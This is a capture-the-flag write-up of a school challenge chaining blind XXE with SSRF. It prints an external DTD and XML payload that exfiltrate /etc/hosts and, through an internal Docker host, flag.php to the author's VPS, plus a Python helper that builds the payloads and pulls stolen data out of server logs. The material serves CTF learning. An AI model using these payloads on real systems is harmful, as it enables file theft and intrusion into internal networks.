[WriteUp] [SSRF]

It's exam week at school, ennnn..... In the school competition I ran into a challenge that combined XXE and SSRF. I thought it was pretty good, so here is a quick record.

This is only a record of the process; for the underlying principles, here are a few links (I reviewed them at the time too; the people before me wrote them up better than I could):

Without knowing the attack, how can you know the defense: XXE vulnerability attack and defense
A simple understanding and test of the XXE vulnerability

file.dtd hosted on my VPS (the XXE part):

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://vps/?p=%payl;'>">

Content posted to the vulnerable data parameter:

<!DOCTYPE convert [
  <!ENTITY % remote SYSTEM "http://my VPS address/file.dtd">
  %remote; %int; %trick;
]>

Check the server log (/var/log/nginx/access.log)

Base64-decode it:

127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.6 flag 5e8af79b12ae xxessrf_flag_1
172.17.0.6 flag_1 5e8af79b12ae xxessrf_flag_1
172.17.0.6 xxessrf_flag_1 5e8af79b12ae
172.17.0.7 74791d7ac29b

Um???? Another layer?? Then read index:

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>XML</title>
	<link rel="stylesheet" href="./bootstrap.min.css">
	<script src="./jquery.min.js"></script>
	<script src="./bootstrap.min.js"></script>
</head>
<body>

<form role="form" id="form" method="POST" action="index.php">
	<div class="form-group">
		<label for="name">XML</label>
		<textarea class="form-control" rows="6" name="data" placeholder="  Hello World!   "></textarea>
	</div>
  <div class="btn-group">
    <button type="button" class="btn btn-default" onclick="document.getElementById('form').submit()">SUBMIT</button>
  </div>
	<?php
	error_reporting(0);
	include("flag.php");
	if(isset($_POST['data']) and $_POST['data'] != "") {
		// LIBXML_NOENT turns on entity substitution, which is what lets the
		// DOCTYPE in the posted XML pull in the remote DTD and expand %payl;
		$xml = simplexml_load_string($_POST['data'], null, LIBXML_NOENT);
	}
	?>
  </form>

Oh?? include("flag.php"). I tried reading it directly, no response; thinking about it, that makes sense, since the hint said SSRF. At that point the morning's work was basically over, and the rest was zoning out until the afternoon...... xxessrf??? Started probing the intranet ports.... from 8080... to 2018... well, I gave up..... Finally picked it up again and sent a screenshot of the hosts file to the team group.

What is your 172.17.0.7?

... Docker. So read the flag over the internal network:

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.6/?file=php://filter/read=convert.base64-encode/resource=flag.php">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://my VPS address/?p=%payl;'>">
UEQ5d2FIQWdDaTh2WldOb2J5QWlZM1Z0ZEdOMFpudENNV2x1TTE5NGVETmZZVzVrWDNOemNtWmZNWE5mUTI5dmJEOTlJanNLUHo0S0NnPT0=

... decoded twice (once for each convert.base64-encode in the chain):

<?php
//echo "cumtctf{B1in3_xx3_and_ssrf_1s_Cool?}";
?>
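As an added example (not code from the original write-up), here is a small Python helper that covers both stages above: generating file.dtd and the POST body for the blind XXE, pulling the exfiltrated blobs back out of nginx access-log lines, and decoding them, including the double-base64 case from the SSRF pivot through 172.17.0.6. The collector host vps.example, the log lines and the hosts-file text are constructed for the example; the payload shapes, the ?p= parameter and the double-base64 blob are the ones shown on this page.

```python
"""Blind (out-of-band) XXE helpers for the flow in this write-up.

Added example, not the write-up's own code. vps.example, SAMPLE_HOSTS and
SAMPLE_LOG are constructed; the payload shapes and NESTED_B64 come from the
write-up.
"""
import base64
import re
from urllib.parse import unquote, urlparse


def php_filter_b64(resource: str) -> str:
    """Read `resource` through php://filter and base64 it, so the parser gets
    one token with no '<', '&', quotes or newlines that would break the
    entity value or the URL it ends up in."""
    return "php://filter/read=convert.base64-encode/resource=" + resource


def build_dtd(resource: str, collector: str) -> str:
    """file.dtd served from the attacker host.

    %payl holds the base64 target contents. %int's replacement text declares
    a third parameter entity, trick, whose SYSTEM URL carries %payl; as the
    query string. The inner '%' is written as the character reference &#37;
    because a literal '%' inside the value would be read as the start of a
    parameter-entity reference while the value is parsed; &#37; becomes '%'
    in the replacement text and is only interpreted later, when %int; is
    referenced in the DOCTYPE. '%payl;' itself is expanded here, which is
    legal in an external DTD but not in the internal subset.
    """
    payl = '<!ENTITY % payl SYSTEM "' + php_filter_b64(resource) + '">\n'
    trick = "<!ENTITY &#37; trick SYSTEM '" + collector + "?p=%payl;'>"
    return payl + '<!ENTITY % int "' + trick + '">\n'


def build_xml(dtd_url: str) -> str:
    """POST body for the data parameter: %remote; loads the external DTD,
    %int; declares trick, %trick; makes the outbound request. References
    between declarations are allowed in the internal subset; references
    inside a declaration are not, which is why the DTD lives on the VPS."""
    return (
        "<!DOCTYPE convert [\n"
        '  <!ENTITY % remote SYSTEM "' + dtd_url + '">\n'
        "  %remote; %int; %trick;\n"
        "]>\n"
        "<convert></convert>"
    )


def ssrf_resource(internal_url: str, path: str) -> str:
    """Second stage: %payl reads an HTTP URL on the linked flag container
    (172.17.0.6 in the hosts file), and its ?file= parameter is itself given a
    php://filter, so the file comes back base64-encoded twice: once by the
    container, once more by the outer filter before it enters the URL."""
    return internal_url + "?file=" + php_filter_b64(path)


LOG_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/')


def extract_from_log(lines, param="p"):
    """Recover the exfiltrated blobs from nginx access-log lines.

    Decode with unquote(), not unquote_plus(): '+' is a base64 digit, and
    turning it into a space corrupts the payload. Any '=' or '/' the parser
    percent-encoded is restored. Lines without the parameter are skipped."""
    found = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        for pair in urlparse(m.group(1)).query.split("&"):
            key, _, value = pair.partition("=")
            if key == param and value:
                found.append(base64.b64decode(unquote(value)))
    return found


def decode_layers(blob: str, layers: int) -> bytes:
    """Strip `layers` of base64: 1 for the direct file read, 2 for the SSRF
    chain (the log extractor already strips the first one)."""
    data = blob.encode()
    for _ in range(layers):
        data = base64.b64decode(data)
    return data


# Constructed sample data so the module runs stand-alone.
SAMPLE_HOSTS = b"127.0.0.1 localhost\n172.17.0.6 flag xxessrf_flag_1\n"
_blob = base64.b64encode(SAMPLE_HOSTS).decode()
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Apr/2019:09:10:11 +0000] "GET /?p=' + _blob + ' HTTP/1.1" 200 5 "-" "-"',
    '198.51.100.7 - - [20/Apr/2019:09:10:12 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "-"',
    # same blob with '=' percent-encoded, as a parser may send it
    '198.51.100.7 - - [20/Apr/2019:09:10:13 +0000] "GET /?p=' + _blob.replace("=", "%3D") + ' HTTP/1.1" 200 5 "-" "-"',
]

# The double-base64 response captured in the write-up's second stage.
NESTED_B64 = "UEQ5d2FIQWdDaTh2WldOb2J5QWlZM1Z0ZEdOMFpudENNV2x1TTE5NGVETmZZVzVrWDNOemNtWmZNWE5mUTI5dmJEOTlJanNLUHo0S0NnPT0="

if __name__ == "__main__":
    print(build_dtd("file:///etc/hosts", "http://vps.example/"))
    print(build_xml("http://vps.example/file.dtd"))
    print(build_dtd(ssrf_resource("http://172.17.0.6/", "flag.php"), "http://vps.example/"))
    for blob in extract_from_log(SAMPLE_LOG):
        print(blob.decode(), end="")
    print(decode_layers(NESTED_B64, 2).decode())
```

Run it as a script to print the two DTD variants, the POST body, the hosts lines recovered from the constructed log, and the flag.php source recovered from the blob above.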

Haven't done a challenge in a long time, my brain is a bit rusty......